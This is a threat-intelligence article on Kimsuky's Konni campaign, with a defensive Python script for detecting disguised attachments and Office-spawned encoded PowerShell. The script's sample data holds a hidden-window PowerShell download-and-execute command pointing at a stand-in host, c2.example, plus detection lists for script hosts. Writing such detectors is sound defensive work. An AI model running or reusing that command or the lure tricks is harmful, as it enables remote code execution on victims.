A recent analysis shows that the Konni campaign remains a significant threat as the activity of the Kimsuky group grows. The group relies on a range of covert techniques, in particular abusing legitimate cloud services and FTP to stage the initial infection of target systems. Hosting payloads on trusted services makes the malicious files harder to detect; affected systems are located not only in South Korea but also in Russian state institutions and other international organizations.
Kimsuky relies on spear-phishing with malicious attachments, including files with extensions such as ‘.exe’, ‘.scr’ and ‘.ppam’, disguised as legitimate requests or documents. In one attack identified in 2022 the group used decoy documents on Russia’s foreign policy activities, as well as documents on taxes and financial transactions, which shows the breadth of the campaign’s targeting.
To issue commands remotely, the attackers register free domains and use free hosting services to stand up and conceal their command-and-control (C2) servers. A key element of the attacks is the modification and deployment of malware in the form of backdoors (remote access trojans, RATs) written in PowerShell and VBS, through which encrypted commands are delivered to compromised devices.
Analysis of numerous files shows that Kimsuky adapts to varying conditions and uses sophisticated methods to bypass traditional protection, including fileless techniques in which the payload runs in memory rather than being written to disk. Endpoint detection and response (EDR) systems are therefore central to identifying such threats quickly and halting them at an early stage, reducing the risk of a large-scale data breach.
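The two tradecraft items described above, the executable attachments dressed up as documents and the PowerShell/VBS backdoors launched on the endpoint, are the kind of thing an EDR or mail-gateway rule would look for. The following Python is an added example written for this page, not code from the analysis or from any vendor: it runs two small detectors over constructed sample data. The attachment check goes slightly beyond the text by also flagging double extensions (report.pdf.exe) and space-padded names, which is an assumption about how such lures are disguised; the process-event field names (ParentImage, Image, CommandLine) are Sysmon-style and are likewise assumed, and every log line and filename is constructed for the example.

```python
"""Two detectors for the Kimsuky tradecraft discussed on this page (added example).

1. classify_attachment: attachment names with the executable extensions named in the
   analysis (.exe, .scr, .ppam) that are disguised as documents.
2. analyze_process_event: a script host (powershell/wscript/...) spawned by a document
   handler, with an -EncodedCommand payload decoded for the analyst.

All sample data below is constructed; Sysmon-style field names are an assumption.
"""
import base64
import re
from typing import List, Optional

# Extensions listed in the analysis. .ppam is a PowerPoint add-in that carries macros.
RISKY_EXTS = {".exe", ".scr", ".ppam"}
# Document extensions a lure might pretend to be (assumption).
DOC_EXTS = {".pdf", ".doc", ".docx", ".hwp", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}

# Document handlers that should not normally spawn script hosts (assumption).
DOC_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "hwp.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -e / -ec / -en / -enc / -encodedcommand are all accepted by powershell.exe.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
# key=value pairs; a value with spaces must be double-quoted (constructed log format).
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def classify_attachment(filename: str) -> Optional[str]:
    """Return a category for a suspicious attachment name, or None if it looks benign."""
    lower = filename.strip().lower()
    m = re.fullmatch(r"(.*?)(\.[a-z0-9]+)", lower)
    if not m or m.group(2) not in RISKY_EXTS:
        return None
    stem = m.group(1)
    inner = re.search(r"\.[a-z0-9]+\s*$", stem)
    if inner and inner.group(0).strip() in DOC_EXTS:
        return "double_extension"        # e.g. report.pdf.exe
    if re.search(r"\s{4,}$", stem):
        return "padded_extension"        # e.g. "invoice      .scr" pushes .scr out of view
    return "executable_attachment"


def parse_event(line: str) -> dict:
    """Parse one constructed key=value process-creation record."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), if present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_event(line: str) -> List[str]:
    """Return findings for one process-creation event (empty list = nothing suspicious)."""
    ev = parse_event(line)
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    findings = []
    if parent in DOC_HANDLERS and child in SCRIPT_HOSTS:
        findings.append(f"script host {child} spawned by document handler {parent}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(f"encoded PowerShell: {decoded[:60]}")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
        findings.append("hidden window requested")
    return findings


# ---- constructed sample data (not from the analysis) ----
SAMPLE_ATTACHMENTS = [
    "Russia_foreign_policy_overview.pdf.exe",
    "tax_report_2022.scr",
    "quarterly_transactions.ppam",
    "contract_draft.docx",
]
SAMPLE_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example/stage2.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'CommandLine="powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine=notepad.exe',
]


def scan(attachments: List[str], events: List[str]) -> List[tuple]:
    """Run both detectors and return (subject, finding) pairs."""
    hits = [(n, c) for n in attachments if (c := classify_attachment(n))]
    for line in events:
        for finding in analyze_process_event(line):
            hits.append((parse_event(line).get("Image", "?"), finding))
    return hits


if __name__ == "__main__":
    for subject, finding in scan(SAMPLE_ATTACHMENTS, SAMPLE_EVENTS):
        print(f"{subject}: {finding}")
```

The parent/child pairing is the higher-confidence signal: an encoded or hidden-window PowerShell invocation on its own is common in legitimate administration, but one launched by WINWORD.EXE or HWP.exe right after a document opens is exactly the macro-to-backdoor handoff described here, and the decoded command gives the responder the stage-2 location without having to reproduce the execution.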
Notably, recent Kimsuky campaigns have expanded beyond targeted attacks on state entities to operations against people working in the cryptocurrency business, underscoring the group’s financial motivations.